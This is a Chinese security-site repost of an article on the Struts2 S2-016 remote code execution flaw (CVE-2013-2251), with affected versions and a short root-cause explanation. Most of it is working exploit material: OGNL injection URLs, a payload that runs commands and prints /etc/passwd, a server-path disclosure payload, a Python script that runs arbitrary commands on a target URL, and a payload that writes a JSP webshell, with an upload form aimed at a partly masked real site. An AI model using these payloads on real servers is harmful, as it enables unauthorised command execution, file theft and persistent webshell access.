首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Struts2再爆远程代码执行漏洞(S2-016)
来源:http://www.freebuf.com 作者:phper 发布时间:2013-07-18  

Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 

描述

影响版本	 Struts 2.0.0 - Struts 2.3.15
报告者	 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号      CVE-2013-2251

漏洞证明

参数会以OGNL表达式执行

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代码执行

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

 

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Apache官方地址

以下仅供教学研究之用,严禁非法用途!

执行任意命令EXP,感谢X提供:

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆网站路径EXP,感谢h4ck0r提供:

 ?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

python执行任意命令,感谢h4ck0r提供

import urllib2,sys,re

def get(url, data):
	string = url + "?" + data
	req = urllib2.Request("%s"%string)
	response = urllib2.urlopen(req).read().strip()
	print strip(response)

def strip(str):
   tmp = str.strip()
   blank_line=re.compile('\x00')
   tmp=blank_line.sub('',tmp)
   return tmp

if __name__ == '__main__':
	url = sys.argv[1]
	cmd = sys.argv[2]
	cmd1 = sys.argv[3]
	attack="redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}"%(cmd,cmd1)
	get(url,attack)

GETSHELL EXP,感谢coffee提供:

?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%

然后用以下代码写shell:

<form action="http://www.***.jp/acdap/test.jsp?f=1.jsp&quot; method="post">
<textarea >code</textarea>
<input type=submit value="提交">
</form>

上前目录生成1.jsp


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·Solaris 10 telnet漏洞及解决
·动网(DVBBS)Version 8.2.0 后
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·南方数据企业网站管理系统V10.0
·dedecms最新版本修改任意管理员
·Discuz!后台拿Webshell 0day
  相关文章
·dedecms最新版本修改任意管理员
·STRUTS2最近量产漏洞分析(2013-
·Struts2远程代码执行漏洞分析(S
·phpcms v9本地文件包含漏洞超详
·phpcms多个版本后台拿shell漏洞
·Spring爆远程代码执行漏洞(含EX
·Struts2最近几个漏洞分析&稳定利
·Discuz的利用UC_KEY进行getshell
·DedeCMS全版本通杀SQL注入漏洞利
·电子商务系统ShopNC多个漏洞(可
·STRUTS2框架的getClassLoader漏
·最土团购网盲注n枚
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved